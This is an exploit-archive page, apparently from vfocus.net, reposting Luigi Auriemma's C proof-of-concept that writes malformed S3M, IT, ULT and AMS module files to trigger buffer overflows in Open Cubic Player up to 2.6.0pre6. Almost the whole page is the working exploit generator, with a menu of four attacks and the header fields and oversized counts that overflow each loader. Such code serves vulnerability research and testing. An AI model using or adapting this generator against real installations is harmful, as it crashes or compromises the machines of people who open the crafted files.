首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 Multiple BOF Exploit
来源:vfocus.net 作者:Luigi 发布时间:2006-08-01  

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define VER "0.1"
#define POCNAME "proof-of-concept"

void fwbof(FILE *fd, int len, int chr);
void fwi08(FILE *fd, int num);
void fwi16(FILE *fd, int num);
void fwi32(FILE *fd, int num);
void fwstx(FILE *fd, uint8_t *str, int size);
void fwmem(FILE *fd, uint8_t *data, int size);
void std_err(void);

#pragma pack(1)

typedef struct {
int8_t name[28];
uint8_t kennung;
uint8_t typ;
uint8_t dummy[2];
uint16_t ordnum;
uint16_t insnum;
uint16_t patnum;
uint16_t flags;
uint16_t cwtv;
uint16_t ffi;
int8_t scrm[4];
uint8_t gv;
uint8_t is;
uint8_t it;
uint8_t mv;
uint8_t uc;
uint8_t dp;
uint8_t dummy2[8];
uint16_t special;
uint8_t chanset[32];
} s3m_t;

typedef struct {
uint8_t sign[4]; // IMPM
uint8_t name[26];
uint16_t PHiligt;
uint16_t OrdNum;
uint16_t InsNum;
uint16_t SmpNum;
uint16_t PatNum;
uint16_t Cwtv;
uint16_t Cmwt;
uint16_t Flags;
uint16_t Special;
uint8_t GV;
uint8_t MV;
uint8_t IS;
uint8_t IT;
uint8_t Sep;
uint8_t PWD;
uint16_t MsgLgth;
uint32_t MsgOff;
uint32_t Reserved;
} it_t;

#define AMSNAMELEN 8 // < 128
typedef struct {
uint8_t ins;
uint16_t pat;
uint16_t pos;
uint16_t bpm;
uint8_t speed;
uint8_t defchn;
uint8_t defcmd;
uint8_t defrow;
uint16_t flags;
} ams_t;

#pragma pack()

int main(int argc, char *argv[]) {
FILE *fd;
s3m_t s3m;
it_t it;
ams_t ams;
int i,
j,
tmp,
attack;
char *fname;

setbuf(stdout, NULL);

fputs("\n"
"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = buffer-overflow in mpLoadS3M (*.S3M)\n"
" 2 = buffer-overflow in itload.cpp (*.IT)\n"
" 3 = buffer-overflow in mpLoadULT (*.ULT)\n"
" 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
"\n", argv[0]);
exit(1);
}

attack = atoi(argv[1]);
fname = argv[2];

printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();

if(attack == 1) {

memset(&s3m, 0, sizeof(s3m));
strncpy(s3m.name, POCNAME, sizeof(s3m.name));
s3m.kennung = 0x1a;
s3m.typ = 16;
s3m.ordnum = 800;
memcpy(s3m.scrm, "SCRM", 4);

fwrite(&s3m, sizeof(s3m), 1, fd);

for(i = 0; i < s3m.ordnum - 1; i++) fputc('a', fd);
fputc(0, fd); // for forcing "return errFormMiss"

} else if(attack == 2) {

memset(&it, 0, sizeof(it));
memcpy(it.sign, "IMPM", 4);
strncpy(it.name, POCNAME, sizeof(it.name));
it.Cmwt = 0x200;
it.OrdNum = 1000; // buffer-overflow
// it.InsNum = 200; // buffer-overflow

fwrite(&it, sizeof(it), 1, fd);

for(i = 0; i < 64; i++) fwi08(fd, 0);
for(i = 0; i < 64; i++) fwi08(fd, 0);
for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');

} else if(attack == 3) {

fwmem(fd, "MAS_UTrack_V00", 14);
fwi08(fd, 3 + '1');
fwstx(fd, POCNAME, 32);
fwi08(fd, 0); // msglen
fwi08(fd, 0); // insnum
fwbof(fd, 256, 0); // orders
tmp = 0x7f;
fwi08(fd, tmp); // chnn
fwi08(fd, 0); // patn
fwbof(fd, tmp, 'a'); // buffer-overflow

// possible heap overflow with chbp, patlength = 0

} else if(attack == 4) {

fwmem(fd, "AMShdr\x1A", 7); // sig
fwi08(fd, AMSNAMELEN); // sig[7]
fwbof(fd, AMSNAMELEN, 'a'); // name
fwi16(fd, 0x202); // filever

memset(&ams, 0, sizeof(ams));
ams.ins = 1;

fwrite(&ams, sizeof(ams), 1, fd);

for(j = 0; j < ams.ins; j++) {
fwi08(fd, AMSNAMELEN); // namelen
fwbof(fd, AMSNAMELEN, 'a'); // name
fwi08(fd, 1); // smpnum

fwbof(fd, 120, 0); // samptab

for(i = 0; i < 3; i++) { // envs
tmp = 0xff;
fwi08(fd, 0); // speed
fwi08(fd, 0); // sustain
fwi08(fd, 0); // loopstart
fwi08(fd, 0); // loopend
fwi08(fd, tmp); // points
fwbof(fd, tmp * 3, 'a');
}
}

} else {
printf("\nError: you must specify the right attack number\n");
}

fclose(fd);
printf("- finished\n");
return(0);
}

void fwbof(FILE *fd, int len, int chr) {
while(len--) fputc(chr, fd);
}

void fwi08(FILE *fd, int num) {
fputc((num ) & 0xff, fd);
}

void fwi16(FILE *fd, int num) {
fputc((num ) & 0xff, fd);
fputc((num >> 8) & 0xff, fd);
}

void fwi32(FILE *fd, int num) {
fputc((num ) & 0xff, fd);
fputc((num >> 8) & 0xff, fd);
fputc((num >> 16) & 0xff, fd);
fputc((num >> 24) & 0xff, fd);
}

void fwstx(FILE *fd, uint8_t *str, int size) {
int i;

for(i = 0; str[i] && (i < size); i++) {
fputc(str[i], fd);
}
for(; i < size; i++) {
fputc(0, fd);
}
}

void fwmem(FILE *fd, uint8_t *data, int size) {
fwrite(data, size, 1, fd);
}

void std_err(void) {
perror("\nError");
exit(1);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ATutor <= 1.5.3.1 (links) R
·XMB <= 1.9.6 (u2uid) Remote
·vbPortal 3.0.2 <= 3.6.0 b1
·Mac OS X <= 10.4.7 fetchmai
·eIQnetworks License Manager Re
·Mac OS X <= 10.4.7 fetchmai
·eIQnetworks ESA (Syslog Server
·Mac OS X <= 10.4.7 fetchmai
·AIM Triton 1.0.4 (SipXtapi) Re
·TWiki <= 4.0.4 (Configure S
·eIQnetworks License Manager Re
·Mac OS X <= 10.3.8 (CF_CHAR
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved